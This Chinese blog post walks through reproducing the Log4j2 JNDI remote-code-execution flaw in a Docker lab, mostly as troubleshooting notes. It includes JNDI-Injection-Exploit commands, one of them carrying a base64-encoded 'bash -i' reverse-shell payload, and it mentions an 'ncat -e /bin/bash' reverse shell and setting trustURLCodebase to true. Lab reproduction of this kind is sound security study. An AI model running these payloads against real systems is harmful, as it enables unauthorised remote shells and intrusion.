Log4j2RCE复现

UzJu@菜菜狗

发布于 2022-04-25 16:23:01

3720

发布于 2022-04-25 16:23:01

文章被收录于专栏：UzJu和菜菜狗UzJu和菜菜狗

一、环境搭建

Tips: 本文出自一个Java废物，如果不对或者不足的地方欢迎大佬提出来或补充

1、推荐本地docker的方式搭建

docker pull vulfocus/log4j2-rce-2021-12-09:latest

2、使用本地环境

二、GETSHELL遇到的问题

1、关于提示RFC 7230的问题

Content-Type: application/x-www-form-urlencoded
# 需要在请求头中加上Content-Type

2、高版本的Macos如何安装低版本的JDK

set theDMG to choose file with prompt "Please select javaforosx.dmg:" of type {"dmg"}
do shell script "hdiutil mount " & quoted form of POSIX path of theDMG
do shell script "pkgutil --expand /Volumes/Java\\ for\\ macOS\\ 2017-001/JavaForOSX.pkg ~/tmp"
do shell script "hdiutil unmount /Volumes/Java\\ for\\ macOS\\ 2017-001/"
do shell script "sed -i '' 's/return false/return true/g' ~/tmp/Distribution"
do shell script "pkgutil --flatten ~/tmp ~/Desktop/Java.pkg"
do shell script "rm -rf ~/tmp"
display dialog "Modified Java.pkg saved on desktop" buttons {"Ok"}

然后桌面找到Java.pkg即可

然后安装在/Library/Java/JavaVirtualMachines/1.6.0.jdk/Contents/Home目录下，然后vim一下配置，增加快捷命令

最后再source一下

这样就可以动态的切换jdk版本了

3、关于报Reference Class Name: foo的解决办法

因为在2018年10月，Java最终也修复了这个利用点，对LDAP Reference远程工厂类的加载增加了限制11.0.1、8u191、7u201、6u211 com.sun.jndi.ldap.object.trustURLCodebase 默认为false

主要存在版本的限制

服务器上的版本太高的问题

1、方法一

需要加上以下代码即可复现

因为在2018年10月，Java最终也修复了这个利用点，对LDAP Reference远程工厂类的加载增加了限制11.0.1、8u191、7u201、6u211 com.sun.jndi.ldap.object.trustURLCodebase 默认为false

System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");

2、方法二

对于这种

可以使用payload

 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/asd" -A 192.168.124.2

网上很多复现教程都没有说，在这里需要选择什么，这里需要选择rmi也就是

随后

服务器上同理

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,base64}|{base64,-d}|{bash,-i}" -A xxxxx

4、关于MacOs下复现报错java.io.IOException: Cannot run program “ncat -e /bin/bash xxx”: error=2, No such file or directory

当前JDK版本

这里主要是因为POC的问题，这里需要构造一个类似于字符串的一个序列一样，不能直接写完整的命令

错误的写法

正确的写法

随后运行，成功反弹Shell

弹计算器

三、使用的工具

https://github.com/welk1n/JNDI-Injection-Exploit

https://github.com/RandomRobbieBF/marshalsec-jar

四、参考

https://www.cnblogs.com/zpchcbd/p/14941783.html

https://www.jianshu.com/p/95dfdcfb952a

https://stackoverflow.com/questions/59409811/illegalargumentexception-the-http-header-line-does-not-conform-to-rfc-7230-when

http://www.hackdig.com/04/hack-81555.htm

https://coderedirect.com/questions/556419/cannot-run-program-error-2-no-such-file-or-directory-java

https://xz.aliyun.com/t/6633#toc-5

本文参与腾讯云自媒体同步曝光计划，分享自作者个人站点/博客。

如有侵权请联系 cloudcommunity@tencent.com 删除

https

本文分享自作者个人站点/博客前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体同步曝光计划，欢迎热爱写作的你一起参与！

登录后参与评论

0 条评论

热度

Log4j2RCE复现

Log4j2RCE复现

一、环境搭建

1、推荐本地docker的方式搭建

2、使用本地环境

二、GETSHELL遇到的问题

1、关于提示RFC 7230的问题

2、高版本的Macos如何安装低版本的JDK

3、关于报Reference Class Name: foo的解决办法

1、方法一

2、方法二

4、关于MacOs下复现报错java.io.IOException: Cannot run program “ncat -e /bin/bash xxx”: error=2, No such file or directory

三、使用的工具

四、参考

社区

活动

资源

关于

腾讯云开发者

热门产品

热门推荐

更多推荐